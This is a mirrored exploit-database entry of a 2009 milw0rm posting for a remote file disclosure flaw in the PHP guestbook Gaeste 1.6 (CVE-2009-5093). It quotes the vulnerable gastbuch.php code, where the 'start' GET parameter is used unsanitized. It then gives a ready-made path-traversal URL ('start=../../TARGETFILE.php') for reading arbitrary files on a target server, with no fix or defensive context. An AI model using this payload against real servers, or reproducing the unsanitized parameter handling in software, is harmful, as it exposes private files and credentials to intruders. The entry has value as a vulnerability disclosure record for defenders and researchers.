[] NeoSense
E X P L O I T S
title author type platform port cve id

Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure

Author: bd0rk
type: webapps
platform: php
port: 
date_added: 2009-02-08 
date_updated:  
verified: 1 
codes: CVE-2009-5093;OSVDB-75373 
tags: 
aliases:  
screenshot_url:  
application_url: 
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------

           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

# milw0rm.com [2009-02-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.